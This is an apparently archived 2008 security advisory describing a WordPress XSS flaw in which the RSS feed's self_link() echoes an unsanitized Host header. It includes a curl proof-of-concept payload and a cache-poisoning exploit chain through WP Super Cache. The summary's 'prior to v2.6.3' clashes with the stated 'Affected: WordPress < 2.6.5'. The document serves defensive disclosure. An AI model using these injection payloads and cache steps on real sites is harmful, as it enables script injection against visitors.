wordpressrss-xss.txt

2008-11-25T00:00:00
ID PACKETSTORM:72277
Type packetstorm
Reporter Jeremias Reith
Modified 2008-11-25T00:00:00

Description

                                        
                                            `===== noXSS.org Security Advisory ======  
  
Advisory: WordPress XSS vulnerability in RSS Feed Generator  
Author: Jeremias Reith <jr@noxss.org>  
Published: 2008/11/25  
Affected: WordPress < 2.6.5  
  
  
Summary  
=======  
  
WordPress prior to v2.6.3 fails to sanitize the Host header variable  
correctly when generating RSS feeds and is therefore prune to XSS  
attacks.  
  
Web Sites running in a name based virtual hosting setup are not  
affected as long as they are not the default virtual host.  
Moreover we only found installations running on the Apache web server  
to be affected.  
  
  
Vulnerability Details  
=====================  
  
The function self_link() in wp-includes/feed.php is used to generate  
absolute URLs for the <atom:link> tag in ATOM and RSS 2.0 feeds:  
  
function self_link() {  
echo 'http'  
. ( $_SERVER['https'] == 'on' ? 's' : '' ) . '://'  
. $_SERVER['HTTP_HOST']  
. wp_specialchars(stripslashes($_SERVER['REQUEST_URI']), 1);  
}  
  
The function does not sanitize the HTTP_HOST variable in any way but  
WordPress replaces all $_SERVER variables with escaped ones in  
wp-settings.php:  
  
$_SERVER = add_magic_quotes($_SERVER);  
  
In almost all setups add_magic_quotes() runs  
mysql_real_escape_string() over the elements and returns the modified  
array. Unfortunately this escaping method is not safe in markup  
context.  
  
  
PoC  
====  
  
The Apache web server only disallows '/', '\' and '..' within the host  
header. The header can therefore contain markup making the following  
PoC possible:  
  
curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" \  
http://www.example.org/blog/feed  
  
The given example request will return (without additional newlines):  
  
-- snip --  
...  
<atom:link href="http://\">  
<body onload=alert(String.fromCharCode(88,83,83))>  
/blog/feed" rel="self" type="application/rss+xml" />  
...  
-- snip --  
  
The embedded JavaScript will be executed in Firefox 3.0.4 due to the  
triggered switch to Quirks mode.  
  
  
Exploit  
=======  
  
The following exploit is a semi-stored XSS attack and has been tested  
with the following setup:  
  
- Apache 2.x with IP based virtual hosting  
- Wordpress 2.6.3 installed in /blog/  
- WP Super Cache 0.84  
- Firefox 3.0.4  
  
  
WP Super Cache is a popular WordPress plugin that adds static file  
caching to WordPress. It greatly increases performance and is  
often used. It saves generated pages in the wp-content/cache directory  
and adds mod_rewrite rules to serve cached pages statically.  
  
Issuing a malicious request to a vulnerable WordPress installation  
will lead to a file containing the XSS to be generated and placed  
within the document root.  
  
Request:  
curl -H "Host: \"><body onload=alert(String.fromCharCode(88,83,83))>" \  
http://www.example.org/blog/feed  
  
Generated file:  
http://example.org/blog/wp-content/cache/wp-cache-#md5sum#.html  
  
Firefox will execute the embedded JavaScript even tough the feed is  
XML because the file is served as text/html.  
  
The only missing the step is the calculation cached file's MD5 sum.  
  
The following code generates the MD5 checksum:  
  
php -r 'echo md5("\"><body   
onload=alert(String.fromCharCode(88,83,83))>".  
"/blog/feed"), "\n";'  
  
In the default setup the MD5 sum can be generated by concatenating the  
contents of HTTP_HOST and REQUEST_URI resulting in  
0d2ca4617758433a7864d57493be2c5b for the given example.  
  
This file can be accessed until the cache expiration mechanism removes  
it. The default expire time is 3600 seconds.  
  
  
Vendor Response  
===============  
2008-11-17 Reported to vendor  
2008-11-17 Initial response from vendor  
2008-11-25 Release of version 2.6.5  
  
  
`